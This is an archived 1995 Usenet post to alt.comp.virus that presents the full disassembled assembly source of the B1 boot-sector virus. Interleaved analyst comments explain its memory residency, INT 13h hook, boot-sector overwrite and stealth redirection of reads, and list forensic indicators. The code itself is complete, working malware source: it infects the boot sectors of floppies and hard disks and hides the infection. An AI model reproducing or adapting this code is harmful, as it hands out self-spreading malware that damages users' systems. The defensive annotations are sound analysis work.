Text File  |  1998-01-14  |  10.8 KB  |  350 lines

  1.  
  2. Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
  3. From: danishm@iia.org ()
  4. Newsgroups: alt.comp.virus
  5. Subject: B1
  6. Date: 5 Feb 1995 22:05:37 GMT
  7. Organization: International Internet Association.
  8. Lines: 330
  9. Message-ID: <3h3i3h$v4@ankh.iia.org>
  10. NNTP-Posting-Host: iia.org
  11. X-Newsreader: TIN [version 1.2 PL2]
  12.  
  13. Here is the B1 virus:
  14.  
  15.   
  16. PAGE  59,132
  17. ; Disassembled using sourcer  
  18. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  19. ;[[                                                                      [[
  20. ;[[                             B1                                       [[
  21. ;[[                                                                      [[
  22. ;[[      Created:   8-Jan-95                                             [[
  23. ;[[      Version:                                                        [[
  24. ;[[      Code type: zero start                                           [[
  25. ;[[      Passes:    5          Analysis Options on: none                 [[
  26. ;[[                                                                      [[
  27. ;[[                                                                      [[
  28. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  29.   
  30. data_1e         equ     413h                    ; (0000:0413=7Fh) BIOS data area: base memory size in KB; sub_1 decrements it
  31. data_2e         equ     46Dh                    ; (0000:046D=17E1h) word inside the BIOS timer-tick counter (dword at 0040:006C); tested at loc_7
  32. data_3e         equ     4Ch                     ; (0006:004C=0DAh) 4 * 13h = INT 13h vector slot; sub_1 loads DS = 0 before using it, so the segment shown by Sourcer is only a guess
  33.   
  34. seg_a           segment byte public
  35.         assume  cs:seg_a, ds:seg_a
  36.   
  37.   
  38.         org     0                       ; listing offsets are relative to the first byte of the sector image
  39.   
  40. virus           proc    far
      ; Analyst notes (defensive reading of the Sourcer output).
      ; Layout of this proc, offsets relative to "org 0":
      ;   0000h  short jump over a data area shaped like a DOS BIOS parameter block
      ;   0040h  loc_2: "push cs" + "call sub_1" (sub_1 never returns here)
      ;   0044h  "push ax": sub_1 writes offset 44h into the INT 13h vector, so
      ;          the code from here to the iret runs as a disk-interrupt filter.
      ; Register frame built at loc_3 (bp = sp after the pushes):
      ;   [bp+00h] bp   [bp+02h] ds   [bp+04h] di   [bp+06h] si   [bp+08h] es
      ;   [bp+0Ah] dx   [bp+0Ch] cx   [bp+0Eh] bx   [bp+10h] ax
      ;   [bp+12h] caller IP   [bp+14h] caller CS   [bp+16h] caller FLAGS
      ; Indicators a responder can check, all taken from the code below and sub_1:
      ;   - sector C0/H0/S1 holds these bytes at 00h-01h and 40h-1BBh
      ;   - BIOS base-memory word at 0000:0413 is 1 KB lower than installed
      ;   - INT 13h vector points to <top-of-memory segment>:0044h
      ;   - while the filter is active, reads of C0/H0/S1 are answered from an
      ;     alternate sector, so inspect the disk after booting from clean media
  41.   
  42. start:
  43.         jmp     short loc_2             ; (0040) skip the parameter-block area
  44.         db       90h, 00h, 4Dh, 4Dh, 49h, 00h   ; 02h: nop filler, 03h: start of 8-byte OEM-name field
  45.         db       33h, 2Eh, 33h, 00h, 02h, 01h   ; '3.3' ends OEM field; 0Bh: 0200h bytes/sector; 0Dh: 1 sector/cluster
  46.         db       01h, 00h, 02h,0E0h, 00h, 40h   ; 0Eh: 1 reserved sector; 10h: 2 FATs; 11h: 00E0h root entries; 13h: total sectors (low byte)
  47.         db       0Bh,0F0h, 09h, 00h, 12h, 00h   ; total = 0B40h; 15h: media F0h; 16h: 9 sectors/FAT; 18h: 12h sectors/track
  48.         db       02h, 00h                       ; 1Ah: 2 heads (values match a 1.44 MB diskette)
  49.         db      19 dup (0)
  50.         db       12h, 00h, 00h, 00h, 00h, 01h
  51.         db       00h,0FAh, 33h,0C0h, 8Eh,0D0h   ; from 36h the bytes decode as cli / xor ax,ax / mov ss,ax ...
  52.         db      0BCh, 00h, 7Ch, 16h, 07h        ; ... mov sp,7C00h / push ss / pop es; never reached by the jump at start.
      ; sub_5 skips offsets 02h-3Fh when copying, so this whole area is
      ; presumably left over from the sector this sample was taken from.
  53. loc_2:
  54.         push    cs                      ; segment half of the far address used by the retf at loc_13
  55.         call    sub_1                   ; (00EF) one-time setup; pops this return address instead of returning
  56.         push    ax                      ; 0044h: INT 13h filter entry, save request AX
  57.         shr     ax,1                    ; AH >> 1; old AH bit 0 moves into AL bit 7
  58.         dec     ah                      ; zero only when the request was AH=02h (read) or AH=03h (write)
  59.         jz      loc_3                   ; read/write: inspect the request
  60.         jmp     loc_14                  ; (01BA) any other function: chain to the saved vector untouched
  61. loc_3:
  62.         push    bx                      ; build the register frame documented at the top of this proc
  63.         push    cx
  64.         push    dx
  65.         push    es
  66.         push    si
  67.         push    di
  68.         push    ds
  69.         push    bp
  70.         mov     bp,sp
  71.         or      ch,ch                   ; low cylinder byte nonzero?
  72.         jnz     loc_5                   ; yes: pass the request through unchanged
  73.         shl     al,1                    ; CF = old AH bit 0: set for write (03h), clear for read (02h)
  74.         jc      loc_4                   ; write request: skip the check-and-modify path
      ; --- read request with CH = 0: examine sector C0/H0/S1 of drive DL ---
  75.         call    sub_6                   ; (0190) AX=0201h, ES:BX=CS:0200h, CX=0001h, DH=0
  76.         call    sub_4                   ; (017B) read it through the saved (original) handler
  77.         jc      loc_7                   ; read error: return that error to the caller
  78.         call    sub_2                   ; (0127) compare buffer+40h with resident code+40h
  79.         jz      loc_4                   ; identical: sector already carries this code
  80.         call    sub_6                   ; (0190)
  81.         call    sub_3                   ; (013B) CX/DH = alternate sector location, CX=0 and ZF=1 if none
  82.         jz      loc_5                   ; no usable location: pass the request through
  83.         inc     ah                      ; AX = 0301h (write one sector)
  84.         call    sub_4                   ; (017B) store the sector just read at the alternate location
  85.         jc      loc_5                   ; write failed (e.g. write-protected): pass the request through
  86.         call    sub_5                   ; (0182) overlay resident bytes 00h-01h and 40h-1BBh onto the buffer
  87.         call    sub_6                   ; (0190)
  88.         inc     ah                      ; AX = 0301h
  89.         call    sub_4                   ; (017B) write the modified buffer back to C0/H0/S1
  90. loc_4:
      ; --- redirect path: requests that touch C0/H0/S1 of a modified disk ---
  91.         call    sub_7                   ; (019E) reload the caller's AX,BX,CX,DX,ES from the frame
  92.         or      ch,dh                   ; fold head into the cylinder byte
  93.         dec     cx                      ; zero only for cylinder 0, head 0, sector 1
  94.         jnz     loc_5                   ; any other location: pass through
  95.         call    sub_6                   ; (0190)
  96.         call    sub_4                   ; (017B) read the real C0/H0/S1 into CS:0200h
  97.         jc      loc_7                   ; read error: return it to the caller
  98.         call    sub_2                   ; (0127)
  99.         jnz     loc_5                   ; sector does not carry this code: pass through
  100.         call    sub_7                   ; (019E)
  101.         call    sub_3                   ; (013B) CX/DH = where the stored copy lives
  102.         dec     byte ptr [bp+10h]       ; saved AL (sector count) minus one
  103.         jz      loc_6                   ; single-sector request: run it at the alternate location
  104.         mov     al,1                    ; multi-sector: first do one sector at the alternate location
  105.         call    sub_4                   ; (017B)
  106.         jc      loc_7                   ; Jump if carry Set
  107.         call    sub_7                   ; (019E) reload registers; AL is now count-1
  108.         add     bx,di                   ; advance buffer; DI presumably still 0200h from sub_2 (assumes the BIOS call preserves DI)
  109.         inc     cl                      ; continue at sector 2
  110.         jmp     short loc_6             ; (00BA)
  111. loc_5:
  112.         call    sub_7                   ; (019E) pass-through: restore the caller's request
  113. loc_6:
  114.         call    sub_4                   ; (017B) run the request through the saved handler
  115. loc_7:
  116.         pushf                           ; Push flags
  117.         pop     bx
  118.         mov     [bp+16h],bx             ; result flags replace the FLAGS image that iret will pop
  119.         xchg    ax,[bp+10h]             ; result AX goes into the frame; AX = saved request AX
  120.         shr     ah,1                    ; CF = request AH bit 0
  121.         jnc     loc_9                   ; read request: done
  122.         xor     ax,ax                   ; Zero register
  123.         mov     ds,ax
  124.         mov     ax,ds:data_2e           ; (0000:046D=17E1h) sample the timer-tick counter
  125.         and     ax,178Fh
  126.         jnz     loc_9                   ; continue only when all masked tick bits are zero
       ; NOTE(review): time-gated branch, reached only after a write request.
       ; The loop issues AX=0201h (read) calls through the saved handler while
       ; toggling CH and the top two bits of CL (the cylinder bits of the INT 13h
       ; CX encoding), and leaves when bit 7 of the returned AH is set. Only
       ; function 02h is issued here; confirm the visible effect with a trace.
  127.         call    sub_6                   ; (0190)
  128. loc_8:
  129.         push    ax
  130.         call    sub_4                   ; (017B)
  131.         xor     cx,0FFC0h
  132.         nop                             ;*ASM fixup - sign extn byte
  133.         shl     ax,1                    ; CF = bit 7 of the status returned in AH
  134.         pop     ax
  135.         jnc     loc_8                   ; Jump if carry=0
  136. loc_9:
  137.         pop     bp                      ; unwind the frame in reverse push order
  138.         pop     ds
  139.         pop     di
  140.         pop     si
  141.         pop     es
  142.         pop     dx
  143.         pop     cx
  144.         pop     bx
  145.         pop     ax                      ; AX = result stored by the xchg at loc_7
  146.         iret                            ; FLAGS image was overwritten at loc_7
  147.   
  148. virus           endp
  149.   
  150. ;__________________________________________________________________________
  151. ;                              SUBROUTINE
  152. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  153.   
  154. sub_1           proc    near
       ; One-time setup, called from loc_2. It does not return to its caller:
       ; the near return address is popped to find the load base, and control
       ; leaves through the retf at the end using a far address built here.
       ; Effects visible to memory forensics:
       ;   - word at 0000:0413 (base memory, KB) is decremented by one
       ;   - bytes 00h-01h and 40h-1BBh are copied to segment (new KB << 6), offset 0
       ;   - the previous INT 13h vector is saved at offset 1BCh of that copy
       ;   - the INT 13h vector at 0000:004C becomes <that segment>:0044h
  155.         mov     bx,44h                  ; filter entry offset; also distance from load base to the return address
  156.         mov     dx,80h                  ; DL = 80h, DH = 0 for the reads issued at loc_13
  157.         mov     si,data_1e              ; (0000:0413=7Fh)
  158.         xor     di,di                   ; DI = 0: destination offset of the copy
  159.         mov     ds,di                   ; DS = 0
  160.         dec     word ptr [si]           ; reserve 1 KB at the top of base memory
  161.         lodsw                           ; AX = new memory size in KB
  162.         pop     si                      ; SI = return address of "call sub_1" (load base + 44h)
  163.         mov     cl,6
  164.         shl     ax,cl                   ; KB * 64 = segment of the reserved 1 KB
  165.         mov     es,ax
  166.         sub     si,bx                   ; SI = load base of the sector
  167.         push    si                      ; with the "push cs" at loc_2: far address popped by the retf at loc_13
  168.         push    ax                      ; segment of the copy ...
  169.         mov     ax,1AEh
  170.         push    ax                      ; ... and offset 01AEh: far address popped by the retf below
  171.         push    cs                      ; popped into ES below
  172.         push    si                      ; popped into BX below
  173.         push    cs
  174.         pop     ds                      ; DS = CS: source segment of the copy
  175.         call    sub_5                   ; (0182) copy; returns with CX = 0 and DI = 01BCh
  176.         mov     ds,cx                   ; DS = 0
  177.         mov     si,data_3e              ; (0006:004C=0DAh) DS:SI -> INT 13h vector
  178.         mov     cl,2
  179.         rep     movsw                   ; save the 4-byte vector at ES:01BCh (read by sub_4 and loc_14)
  180.         mov     [si-4],bx               ; new INT 13h offset = 0044h
  181.         mov     [si-2],es               ; new INT 13h segment = the copy
  182.         pop     bx                      ; BX = load base offset
  183.         pop     es                      ; ES = original CS; ES:BX is the read buffer at loc_13
  184.         retf                            ; continue at <copy segment>:01AEh
  185. sub_1           endp
  186.   
  187.   
  188. ;__________________________________________________________________________
  189. ;                              SUBROUTINE
  190. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  191.   
  192. sub_2           proc    near
       ; Compare the resident code with a sector image at ES:BX.
       ; Compares CX bytes starting at offset CX of both (CS:0040h against
       ; ES:[BX+40h] when CH = 0 on entry; only CL is loaded here).
       ; Out: ZF = 1 if all compared bytes match. DS = CS, SI = 0, DI = BX.
  193.         cld                             ; Clear direction
  194.         push    cs
  195.         pop     ds
  196.         xor     si,si                   ; Zero register
  197.         mov     di,bx
  198.         mov     cl,40h                  ; '@'
  199.         push    si
  200.         push    di
  201.         add     si,cx                   ; start at offset 40h, past the parameter-block area
  202.         add     di,cx
  203.         repe    cmpsb                   ; Rep zf=1+cx >0 Cmp [si] to es:[di]
  204.         pop     di                      ; pops and retn leave ZF from the compare intact
  205.         pop     si
  206.         retn
  207. sub_2           endp
  208.   
  209.   
  210. ;__________________________________________________________________________
  211. ;                              SUBROUTINE
  212. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  213.   
  214. sub_3           proc    near
       ; Work out the alternate sector location used by the filter.
       ; In:  DL = BIOS drive number, DS:DI -> sector image with a parameter block.
       ; Out: CX = cylinder/sector in INT 13h encoding, DH = head; AX preserved.
       ;      On a failed sanity check CX = 0 and ZF = 1.
       ; DL bit 7 set: fixed location, cylinder 0 / head 0 / sector 17.
       ; Otherwise: N = ([DI+11h] >> 4) + 2 * [DI+16h], converted to CHS with
       ; [DI+18h] and [DI+1Ah]. With the field meanings of a DOS parameter block
       ; (root entries, sectors per FAT, sectors per track, heads) and one
       ; reserved sector plus two FATs, N is the last root-directory sector.
       ; NOTE(review): that interpretation assumes 512-byte sectors; confirm.
  215.         push    ax
  216.         xor     dh,dh                   ; head defaults to 0
  217.         test    dl,80h                  ; bit 7 set = BIOS fixed-disk numbering
  218.         jz      loc_10                  ; Jump if zero
  219.         mov     cx,11h                  ; cylinder 0, sector 17
  220.         jmp     short loc_11            ; (0175) ZF = 0 from the test above
  221. loc_10:
  222.         mov     ax,[di+11h]
  223.         mov     cl,4
  224.         shr     ax,cl                   ; entries / 16
  225.         mov     cx,ax
  226.         mov     ax,[di+16h]
  227.         shl     ax,1                    ; times two
  228.         jc      loc_12                  ; overflow: reject
  229.         add     ax,cx                   ; AX = N
  230.         jc      loc_12                  ; overflow: reject
  231.         xor     cx,cx                   ; Zero register
  232.         cmp     ah,[di+18h]             ; guard: quotient must fit in AL (also rejects a zero divisor)
  233.         jae     loc_12                  ; Jump if above or =
  234.         div     byte ptr [di+18h]       ; al,ah rem = ax/data
  235.         xchg    cl,ah                   ; CL = remainder (sector, zero-based); AH = 0
  236.         cmp     ah,[di+1Ah]             ; AH is 0 here, so this rejects only a zero divisor
  237.         jae     loc_12                  ; Jump if above or =
  238.         div     byte ptr [di+1Ah]       ; al,ah rem = ax/data
  239.         mov     ch,al                   ; cylinder
  240.         mov     dh,ah                   ; head
  241.         inc     cx                      ; sector numbers are one-based
  242. loc_11:
  243.         pop     ax                      ; pop/retn keep the flags the caller tests
  244.         retn
  245. loc_12:
  246.         xor     cx,cx                   ; failure: CX = 0, ZF = 1
  247.         jmp     short loc_11            ; (0175)
  248. sub_3           endp
  249.   
  250.   
  251. ;__________________________________________________________________________
  252. ;                              SUBROUTINE
  253. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  254.   
  255. sub_4           proc    near
       ; Invoke the handler whose address is stored at CS:01BCh (the slot sub_1
       ; fills with the previous INT 13h vector). pushf + far call builds the
       ; same stack image as an INT instruction, so the handler's iret returns here.
       ; Registers and flags on return are whatever that handler leaves.
  256.         pushf                           ; Push flags
  257.         call    dword ptr cs:[1BCh]     ; (7379:01BC=0D79h) address shown is Sourcer's sample value
  258.         retn
  259. sub_4           endp
  260.   
  261.   
  262. ;__________________________________________________________________________
  263. ;                              SUBROUTINE
  264. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  265.   
  266. sub_5           proc    near
       ; Copy the code image from DS:SI to ES:DI, leaving two gaps untouched.
       ; Copied:  offsets 00h-01h (one word) and 40h-1BBh (17Ch bytes).
       ; Skipped: offsets 02h-3Fh in both source and destination.
       ; Nothing at or above 1BCh is written, so a 512-byte destination keeps
       ; its own bytes 1BCh-1FFh.
       ; Out: CX = 0, SI and DI advanced by 1BCh.
  267.         cld                             ; Clear direction
  268.         movsw                           ; Mov [si] to es:[di]
  269.         mov     cx,17Ch
  270.         add     si,3Eh                  ; step over 02h-3Fh
  271.         add     di,3Eh
  272.         rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]
  273.         retn
  274. sub_5           endp
  275.   
  276.   
  277. ;__________________________________________________________________________
  278. ;                              SUBROUTINE
  279. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  280.   
  281. sub_6           proc    near
       ; Load the registers for a one-sector INT 13h read of cylinder 0, head 0,
       ; sector 1 into the scratch buffer that follows the code image.
       ; Out: AX = 0201h, BX = 0200h, CX = 0001h, DH = 0, ES = CS. DL is not changed.
  282.         push    cs
  283.         mov     ax,200h
  284.         mov     bx,ax                   ; buffer offset 0200h
  285.         xor     cx,cx                   ; Zero register
  286.         xor     dh,dh                   ; Zero register
  287.         inc     cx                      ; CX = 0001h: cylinder 0, sector 1
  288.         inc     ax                      ; AX = 0201h: function 02h, one sector
  289.         pop     es                      ; ES = CS
  290.         retn
  291. sub_6           endp
  292.   
  293.   
  294. ;__________________________________________________________________________
  295. ;                              SUBROUTINE
  296. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  297.   
  298. sub_7           proc    near
       ; Reload AX, BX, CX, DX and ES from the BP-relative slots written by the
       ; pushes at loc_3 (and by "push ax" just before it). Flags are not changed.
       ; Note [bp+10h] may already have been decremented by the code after loc_4.
  299.         mov     ax,[bp+10h]
  300.         mov     bx,[bp+0Eh]
  301.         mov     cx,[bp+0Ch]
  302.         mov     dx,[bp+0Ah]
  303.         mov     es,[bp+8]
  304.         retn
  305. sub_7           endp
  306.   
  307.         db      41h                     ; Inc   cx   ? -- offset 01AEh, the target of sub_1's retf; runs as "inc cx" (CX 0 -> 1)
  308. loc_13:
       ; Entered once from sub_1 with DX = 0080h, CX = 0001h and ES:BX = the
       ; address the sector was loaded at. The int 13h below already goes
       ; through the vector sub_1 installed.
  309.         mov     ax,201h
  310.         int     13h                     ; Disk  dl=drive a  ah=func 02h
  311.                         ;  read sectors to memory es:bx
  312.         xor     dl,80h                  ; first pass: 80h -> 00h; second pass: 00h -> 80h
  313.         jz      loc_13                  ; so the read is issued for DL = 80h, then DL = 00h
  314.         retf                            ; far return to the load address pushed by loc_2 / sub_1
  315. loc_14:
       ; Chain path for INT 13h functions other than 02h/03h: restore AX and
       ; jump to the previous handler.
  316.         pop     ax
  317. ;*              jmp     far ptr loc_1           ;*(000A:0D79)
  318.         db      0EAh, 79h, 0Dh, 0Ah, 00h        ; far jmp opcode; its 4 operand bytes sit at offset 1BCh, the slot sub_1 overwrites in memory
       ; sub_5 never copies offset 1BCh and above, so the operand bytes and the
       ; text below are whatever the captured sector held there. In this dump
       ; the operand looks like the tail of a text message ('y', CR, LF, 0)
       ; followed by DOS boot-sector strings -- presumably remnants of the
       ; original boot sector.
  319.         db      0Dh, 0Ah, 'Disk Boot failure', 0Dh
  320.         db      0Ah, 0
  321.         db      'IBMBIO  COMIBMDOS  COM'
  322.         db      18 dup (0)
  323.         db       55h,0AAh               ; boot-sector signature at offsets 1FEh-1FFh
  324.   
  325. seg_a           ends
  326.   
  327.   
  328.   
  329.         end     start
  330.  
  331. ls virus.asm
  332.  
  333.  
  334.  
  335. ls virus.asm
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344. --
  345. Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
  346. The Great Sporkeus Maximus                 ekilby@lynx.dac.neu.edu
  347. Student at the Northeastern University College of Computer Science 
  348. "I Can't Believe It's Not Butter"
  349.  
  350.